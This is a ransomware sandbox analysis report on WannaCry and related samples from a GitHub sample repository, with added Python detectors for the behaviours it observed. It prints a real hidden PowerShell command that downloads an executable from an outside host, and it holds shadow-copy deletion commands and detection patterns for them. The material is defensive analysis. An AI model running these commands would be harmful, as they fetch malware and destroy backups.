Analysis

max time kernel: 515s
max time network: 519s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 09-05-2024 20:49
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://github.com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware.Cerber.zip
Resource: win11-20240426-en
General

Target: https://github.com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware.Cerber.zip

Malware Config

Extracted: http://french-cooking.com/myguy.exe
Extracted: C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
Family: wannacry
Wallet: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
Blocklisted process makes network request 1 IoCs
Processes: powershell.exe
flow 40, pid 2924, powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell with its console window hidden.
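As an added example (not part of the sandbox report or of the samples it ran), the following Python triages process-creation events for the two behaviours flagged above: the hidden-window PowerShell download cradle that mshta.exe spawned (its command line and pid 2924 are taken from the process tree further down) and shadow-copy deletion, for which the report records only the signature and the WMIC.exe/vssvc.exe privilege activity, so the vssadmin and wmic command lines are constructed samples. The event structure, the other pids, the benign lines and the scoring weights are assumptions.

```python
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    pid: int
    image: str         # executable name, e.g. "powershell.exe"
    parent_image: str  # parent's executable name
    cmdline: str


@dataclass
class Finding:
    pid: int
    rule: str
    score: int
    evidence: list = field(default_factory=list)


URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
CRADLE_RE = re.compile(
    r"(Net\.WebClient|Download(?:File|String|Data)|Invoke-WebRequest|\biwr\b|"
    r"Start-BitsTransfer|Invoke-Expression|\biex\b)", re.I)
USER_WRITABLE_RE = re.compile(
    r"\\AppData\\(?:Roaming|Local\\Temp)\\|\\ProgramData\\|\\Users\\Public\\", re.I)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "winword.exe", "excel.exe", "outlook.exe"}

# (image, pattern over the command line, description). The report does not show the
# command lines behind its "Deletes shadow copies" signature; these are the usual ones.
RECOVERY_RULES = [
    ("vssadmin.exe", re.compile(r"delete\s+shadows", re.I), "vssadmin delete shadows"),
    ("wmic.exe", re.compile(r"shadowcopy\s+delete", re.I), "wmic shadowcopy delete"),
    ("powershell.exe", re.compile(r"Win32_ShadowCopy.*(?:\.Delete\(|Remove-(?:Wmi|Cim))", re.I),
     "Win32_ShadowCopy deleted via WMI"),
    ("bcdedit.exe", re.compile(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures", re.I),
     "boot recovery disabled"),
    ("wbadmin.exe", re.compile(r"delete\s+catalog", re.I), "backup catalog deleted"),
]


def is_hidden_window(cmdline):
    """True when a -WindowStyle Hidden switch is present. PowerShell accepts any
    unambiguous prefix of both the switch and its value (-w h, -wi hid, ...)."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok.lower()
        if t.startswith("-w") and "-windowstyle".startswith(t) and "hidden".startswith(toks[i + 1].lower()):
            return True
    return False


def detect_download_cradle(ev):
    if ev.image.lower() not in ("powershell.exe", "pwsh.exe"):
        return None
    api = CRADLE_RE.search(ev.cmdline)
    urls = URL_RE.findall(ev.cmdline)
    if not (api and urls):  # a bare URL (Start-Process https://...) is not a cradle
        return None
    evidence = [f"cradle API {api.group(1)}", f"remote URL {urls[0]}"]
    score = 5
    if is_hidden_window(ev.cmdline):
        evidence.append("hidden window")
        score += 2
    if USER_WRITABLE_RE.search(ev.cmdline):
        evidence.append("payload written to user-writable path")
        score += 1
    if ev.parent_image.lower() in SCRIPT_HOSTS:
        evidence.append(f"spawned by {ev.parent_image}")
        score += 2
    return Finding(ev.pid, "powershell_download_cradle", score, evidence)


def detect_recovery_inhibition(ev):
    for image, pat, desc in RECOVERY_RULES:
        if ev.image.lower() == image and pat.search(ev.cmdline):
            return Finding(ev.pid, "inhibit_system_recovery", 5, [desc])
    return None


def analyze(events):
    out = []
    for ev in events:
        for detector in (detect_download_cradle, detect_recovery_inhibition):
            finding = detector(ev)
            if finding:
                out.append(finding)
    return out


SAMPLE_EVENTS = [
    # From the report: mshta.exe (pid 2260) spawning the hidden PowerShell cradle (pid 2924)
    ProcEvent(2924, "powershell.exe", "mshta.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\50121.exe');'''),
    # Constructed: the shadow-copy wipe the "Deletes shadow copies" signature refers to
    ProcEvent(4100, "vssadmin.exe", "cmd.exe", "vssadmin delete shadows /all /quiet"),
    ProcEvent(4104, "wmic.exe", "cmd.exe", "wmic shadowcopy delete"),
    # Constructed benign activity that must not fire
    ProcEvent(5000, "powershell.exe", "explorer.exe", "powershell.exe -NoProfile -Command Get-Process | Sort-Object CPU"),
    ProcEvent(5004, "vssadmin.exe", "cmd.exe", "vssadmin list shadows"),
    ProcEvent(5008, "powershell.exe", "explorer.exe", "powershell.exe -w h -c Start-Process https://example.com/docs"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.pid, f.rule, f.score, "; ".join(f.evidence))
```

The cradle rule requires both a download API and a URL before it fires; the hidden window, the drop location and the script-host parent only raise the score. On the report's own command line all four signals line up, which is why the mshta-to-powershell chain deserves more attention than the generic "Command and Scripting Interpreter" label suggests.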
Drops startup file 3 IoCs
Processes: svchost.exe, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk (svchost.exe)
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD71AA.tmp (ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe)
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD71C1.tmp (ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe)
Executes dropped EXE 22 IoCs
Processes: taskdl.exe, @WanaDecryptor@.exe, taskhsvc.exe, taskse.exe
pid 1588 taskdl.exe
pid 664 @WanaDecryptor@.exe
pid 2436 @WanaDecryptor@.exe
pid 3492 taskhsvc.exe
pid 2732 taskdl.exe
pid 4556 taskse.exe
pid 3288 @WanaDecryptor@.exe
pid 1756 taskdl.exe
pid 4632 taskse.exe
pid 2812 @WanaDecryptor@.exe
pid 1412 taskse.exe
pid 2388 @WanaDecryptor@.exe
pid 1980 taskdl.exe
pid 4940 taskse.exe
pid 2116 @WanaDecryptor@.exe
pid 3680 taskdl.exe
pid 4620 taskse.exe
pid 2528 @WanaDecryptor@.exe
pid 4520 taskdl.exe
pid 2088 taskse.exe
pid 3392 @WanaDecryptor@.exe
pid 4228 taskdl.exe
Loads dropped DLL 9 IoCs
Processes: taskhsvc.exe (WannaCry's bundled Tor client, hence the DLL loads)
pid 3492 taskhsvc.exe (9 loads)
Modifies file permissions 1 TTPs 1 IoCs
Adds Run key to start application 2 TTPs 1 IoCs
Processes: reg.exe
Set value (str): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\czxlscessk897 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\"" (reg.exe)
Drops desktop.ini file(s) 2 IoCs
Processes: svchost.exe
File created: C:\Windows\assembly\Desktop.ini (svchost.exe)
File opened for modification: C:\Windows\assembly\Desktop.ini (svchost.exe)
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, @WanaDecryptor@.exe
Set value (str): \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" (ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" (@WanaDecryptor@.exe)
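Added example, not code from the report or from the samples: the Python below parses registry IoC lines in the format this report uses (the value data is JSON-escaped, so json.loads decodes it) and applies the checks a reviewer would want for the two signatures above. The Run value czxlscessk897 is written by reg.exe, lands under WOW6432Node (so the writer was a 32-bit process on this x64 image) and points into %TEMP%; the wallpaper is set to @WanaDecryptor@.bmp by the payload itself rather than by explorer.exe. The OneDrive and explorer.exe lines are constructed benign controls, and the heuristics and their thresholds are assumptions.

```python
import json
import re
from dataclasses import dataclass


@dataclass
class RegEvent:
    op: str          # "Set value", "Key created", ...
    vtype: str       # value type as printed ("str", "dword"); "" for key-level operations
    key: str
    value_name: str  # "" for key-level operations
    data: str        # decoded value data; "" when the line carries none
    process: str


# One sandbox IoC line: <op> [(<type>)] <\REGISTRY\...path> [= "<json-escaped data>"] <process>
LINE_RE = re.compile(
    r"^(?P<op>Set value|Key created|Key opened|Key value queried|Key deleted)"
    r"(?: \((?P<vtype>\w+)\))? (?P<path>\\REGISTRY\\.*?)"
    r'(?: = (?P<data>".*"))? (?P<process>\S+)$')

RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once|OnceEx|Services)?$", re.I)
USER_WRITABLE_RE = re.compile(
    r"\\(?:AppData\\(?:Roaming|Local\\Temp)|ProgramData|Users\\Public|Downloads|Desktop)\\", re.I)
CLI_WRITERS = {"reg.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WALLPAPER_OWNERS = {"explorer.exe", "systemsettings.exe"}  # processes that normally change it


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised registry IoC line: {line!r}")
    path = m["path"]
    if m["op"] in ("Set value", "Key value queried") and "\\" in path:
        key, value_name = path.rsplit("\\", 1)   # last component is the value name
    else:
        key, value_name = path, ""
    data = json.loads(m["data"]) if m["data"] else ""  # undo the \\ and \" escaping
    return RegEvent(m["op"], m["vtype"] or "", key, value_name, data, m["process"])


def first_path(data):
    """Executable path from a Run value, which may be quoted and carry arguments."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def looks_random(name):
    """Cheap heuristic for generated names such as 'czxlscessk897': long, mixes
    letters and digits, and has almost no vowels."""
    letters = [c for c in name.lower() if c.isalpha()]
    if len(name) < 8 or not letters or not any(c.isdigit() for c in name):
        return False
    vowels = sum(c in "aeiou" for c in letters)
    return vowels / len(letters) < 0.25


def triage(ev):
    hits = []
    if ev.op != "Set value":
        return hits
    if RUN_KEY_RE.search(ev.key):
        exe = first_path(ev.data)
        if USER_WRITABLE_RE.search(exe):
            hits.append(f"autorun '{ev.value_name}' points into a user-writable directory: {exe}")
        if ev.process.lower() in CLI_WRITERS:
            hits.append(f"autorun written by {ev.process} rather than an installer")
        if looks_random(ev.value_name):
            hits.append(f"autorun value name '{ev.value_name}' looks machine-generated")
        if "\\wow6432node\\" in ev.key.lower():
            hits.append("32-bit writer (key redirected to WOW6432Node)")
    elif ev.key.lower().endswith("\\control panel\\desktop") and ev.value_name.lower() == "wallpaper":
        if ev.process.lower() not in WALLPAPER_OWNERS:
            hits.append(f"wallpaper replaced by {ev.process}: {ev.data}")
    return hits


def triage_lines(lines):
    return [(ev.process, triage(ev)) for ev in map(parse_line, lines)]


SAMPLE_LINES = [
    # Report line: WannaCry's tasksche.exe autorun, written by reg.exe into the 32-bit view of HKLM
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\czxlscessk897 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\"" reg.exe',
    # Report line: the ransom-note wallpaper
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe',
    # Report line: key-level operation with a space inside the key name (no value, no data)
    r'Key created \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings msedge.exe',
    # Constructed benign lines: a vendor autorun and a wallpaper change made by the shell
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background" OneDrive.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\Wallpaper\\Windows\\img0.jpg" explorer.exe',
]

if __name__ == "__main__":
    for process, hits in triage_lines(SAMPLE_LINES):
        print(process, hits or "no findings")
```

The Run value fires on four independent grounds, and the wallpaper line on one; the constructed OneDrive autorun and the explorer.exe wallpaper change produce nothing, which is the behaviour you want before pointing such a rule at a fleet.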
Drops file in Windows directory 3 IoCs
Processes: svchost.exe
File opened for modification: C:\Windows\assembly\Desktop.ini (svchost.exe)
File opened for modification: C:\Windows\assembly (svchost.exe)
File created: C:\Windows\assembly\Desktop.ini (svchost.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 2 IoCs
Processes: WerFault.exe
pid 2388 WerFault.exe, target pid 2436 @WanaDecryptor@.exe
pid 3884 WerFault.exe, target pid 2436 @WanaDecryptor@.exe
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: msedge.exe
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
Modifies registry class 1 IoCs
Processes: msedge.exe
Key created: \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings (msedge.exe)
Modifies registry key 1 TTPs 1 IoCs
NTFS ADS 11 IoCs
Processes: msedge.exe, svchost.exe
File opened for modification: C:\Users\Admin\Downloads\Ransomware.Petrwrap.zip:Zone.Identifier (msedge.exe)
File created: C:\Users\Admin\AppData\Roaming\svchost.exe\:Zone.Identifier:$DATA (svchost.exe)
File opened for modification: C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier (msedge.exe)
File opened for modification: C:\Users\Admin\Downloads\Ransomware.WannaCry (1).zip:Zone.Identifier (msedge.exe)
File opened for modification: C:\Users\Admin\Downloads\Ransomware.Thanos.zip:Zone.Identifier (msedge.exe)
File opened for modification: C:\Users\Admin\Downloads\Ransomware.Jigsaw.zip:Zone.Identifier (msedge.exe)
File opened for modification: C:\Users\Admin\Downloads\Ransomware.Cerber.zip:Zone.Identifier (msedge.exe)
File opened for modification: C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus.zip:Zone.Identifier (msedge.exe)
File opened for modification: C:\Users\Admin\Downloads\Ransomware.Vipasana.zip:Zone.Identifier (msedge.exe)
File opened for modification: C:\Users\Admin\Downloads\Ransomware.Petya.zip:Zone.Identifier (msedge.exe)
File opened for modification: C:\Users\Admin\Downloads\Ransomware.Petya (1).zip:Zone.Identifier (msedge.exe)
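Added example, not code from the report: the ADS lines above record two different things. Ten of them are Edge's quarantine utility processes applying Mark-of-the-Web (a Zone.Identifier stream) to the archives the analyst downloaded, which is expected. The eleventh is the dropped svchost.exe in AppData\Roaming writing a Zone.Identifier stream on itself, which no browser was involved in. The Python below parses lines in this report's format, separates the two cases, and decodes the INI-style body of a Zone.Identifier stream so the origin zone can be read; the stream body, its HostUrl, and the final non-MOTW line are constructed samples, and the process allow-list is an assumption.

```python
import re
from dataclasses import dataclass


@dataclass
class AdsEvent:
    op: str           # "File created" / "File opened for modification"
    file: str         # host file the stream is attached to
    stream: str       # stream name, e.g. "Zone.Identifier"
    stream_type: str  # "$DATA" when the sandbox printed it, else ""
    process: str


OPS = ("File created", "File opened for modification", "File deleted")
# host path, optional stray backslash (as printed for svchost.exe above), ':stream', optional ':$TYPE'
ADS_RE = re.compile(r"^(?P<file>[A-Za-z]:\\.*?)\\?:(?P<stream>[^\\:]+)(?::(?P<stype>\$[A-Za-z]+))?$")

BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "brave.exe", "outlook.exe"}
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".com", ".ps1", ".bat", ".cmd", ".hta", ".js", ".vbs")
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites", 3: "Internet", 4: "Restricted sites"}


def parse_ads_line(line):
    line = line.strip()
    op = next((o for o in OPS if line.startswith(o + " ")), None)
    if op is None:
        raise ValueError(f"unknown operation: {line!r}")
    path, process = line[len(op) + 1:].rsplit(" ", 1)  # paths may contain spaces
    m = ADS_RE.match(path)
    if not m:
        raise ValueError(f"no alternate data stream in: {path!r}")
    return AdsEvent(op, m["file"], m["stream"], m["stype"] or "", process)


def classify(ev):
    proc = ev.process.lower()
    if ev.stream.lower() == "zone.identifier":
        if proc in BROWSERS:
            return "motw_applied"                 # expected: the download got Mark-of-the-Web
        if ev.file.lower().endswith(EXECUTABLE_EXT):
            return "ads_written_by_non_browser"   # a dropped binary tagging itself, or MOTW tampering
        return "motw_other"
    return "non_motw_stream"                      # arbitrary ADS: possible payload hiding


def downloaded_files(events):
    """Inventory of files the browser tagged with Mark-of-the-Web."""
    return sorted({e.file for e in events if classify(e) == "motw_applied"})


def parse_zone_identifier(content):
    """Decode the [ZoneTransfer] section of a Zone.Identifier stream body."""
    out, section = {}, None
    for raw in content.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            k, v = line.split("=", 1)
            out[k.strip()] = v.strip()
    if "ZoneId" in out:
        out["ZoneId"] = int(out["ZoneId"])
        out["zone_name"] = ZONE_NAMES.get(out["ZoneId"], "unknown")
    return out


SAMPLE_ADS_LINES = [
    # The eleven lines from the report
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.Petrwrap.zip:Zone.Identifier msedge.exe",
    r"File created C:\Users\Admin\AppData\Roaming\svchost.exe\:Zone.Identifier:$DATA svchost.exe",
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier msedge.exe",
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.WannaCry (1).zip:Zone.Identifier msedge.exe",
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.Thanos.zip:Zone.Identifier msedge.exe",
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.Jigsaw.zip:Zone.Identifier msedge.exe",
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.Cerber.zip:Zone.Identifier msedge.exe",
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus.zip:Zone.Identifier msedge.exe",
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.Vipasana.zip:Zone.Identifier msedge.exe",
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.Petya.zip:Zone.Identifier msedge.exe",
    r"File opened for modification C:\Users\Admin\Downloads\Ransomware.Petya (1).zip:Zone.Identifier msedge.exe",
    # Constructed: a stream that is not Mark-of-the-Web at all
    r"File created C:\Users\Admin\AppData\Roaming\notes.txt:payload.bin dropper.exe",
]

# Constructed stream body; the ReferrerUrl is the report's target, the HostUrl is made up.
SAMPLE_ZONE_IDENTIFIER = (
    "[ZoneTransfer]\r\nZoneId=3\r\n"
    "ReferrerUrl=https://github.com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware.Cerber.zip\r\n"
    "HostUrl=https://github.com/\r\n"
)

if __name__ == "__main__":
    events = [parse_ads_line(l) for l in SAMPLE_ADS_LINES]
    for e in events:
        print(classify(e), e.process, e.file, e.stream)
    print(parse_zone_identifier(SAMPLE_ZONE_IDENTIFIER))
```

ZoneId 3 means the file was marked as coming from the Internet zone, which is what triggers SmartScreen and the Office Protected View on open; a Zone.Identifier stream written by something other than the browser, as on the dropped svchost.exe here, is worth pulling and reading rather than assuming it is a normal download marker.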
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes: msedge.exe, identity_helper.exe, powershell.exe, taskhsvc.exe
pid 484 msedge.exe (2 events)
pid 2800 msedge.exe (2 events)
pid 2552 msedge.exe (2 events)
pid 4700 identity_helper.exe (2 events)
pid 5040 msedge.exe (2 events)
pid 4228 msedge.exe (4 events)
pid 1756 msedge.exe (2 events)
pid 3020 msedge.exe (2 events)
pid 4896 msedge.exe (2 events)
pid 1992 msedge.exe (2 events)
pid 4224 msedge.exe (2 events)
pid 4344 msedge.exe (2 events)
pid 1772 msedge.exe (2 events)
pid 2924 powershell.exe (2 events)
pid 1236 msedge.exe (2 events)
pid 3668 msedge.exe (2 events)
pid 3492 taskhsvc.exe (6 events)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid 3288 @WanaDecryptor@.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
Processes: msedge.exe
pid 2800 msedge.exe (17 events)
Suspicious use of AdjustPrivilegeToken 61 IoCs
Processes: powershell.exe, svchost.exe, WMIC.exe, vssvc.exe, taskse.exe
pid 2924 powershell.exe: SeDebugPrivilege
pid 3124 svchost.exe: SeDebugPrivilege, 33, SeIncBasePriorityPrivilege
pid 1516 WMIC.exe (the same 21-privilege set enabled twice, 42 events): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
pid 1052 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
pid 4556 taskse.exe: SeTcbPrivilege (2 events)
pid 4632 taskse.exe: SeTcbPrivilege (2 events)
pid 1412 taskse.exe: SeTcbPrivilege (2 events)
pid 4940 taskse.exe: SeTcbPrivilege (2 events)
pid 4620 taskse.exe: SeTcbPrivilege (2 events)
pid 2088 taskse.exe: SeTcbPrivilege (2 events)
The numeric entries are privilege LUIDs the sandbox did not resolve to names: 33 is SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege and 36 SeDelegateSessionUserImpersonatePrivilege.
Suspicious use of FindShellTrayWindow 64 IoCs
Processes: msedge.exe
pid 2800 msedge.exe (64 events)
Suspicious use of SendNotifyMessage 16 IoCs
Processes: msedge.exe
pid 2800 msedge.exe (16 events)
Suspicious use of SetWindowsHookEx 11 IoCs
Processes: @WanaDecryptor@.exe
pid 664 (2 events), pid 2436 (2 events), pid 3288 (2 events), pid 2812, pid 2388, pid 2116, pid 2528, pid 3392
Suspicious use of WriteProcessMemory 64 IoCs
Processes: msedge.exe
pid 2800 msedge.exe wrote into the memory of its own child msedge.exe processes 4188, 2076, 484 and 4788 (64 events). The Chromium sandbox broker writes into sandboxed children while launching them, so for the browser process this is expected behaviour rather than injection.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Views/modifies file attributes 1 TTPs 2 IoCs
Processes: attrib.exe
pid 1516 attrib.exe
pid 3424 attrib.exe
Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware.Cerber.zip
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID: 2800
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa58563cb8,0x7ffa58563cc8,0x7ffa58563cd8
    PID: 4188

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
    PID: 2076

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
    PID: 484

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
    PID: 4788

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
    PID: 4932

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    PID: 1188

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 2552

    C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5288 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 4700

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
    PID: 492

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
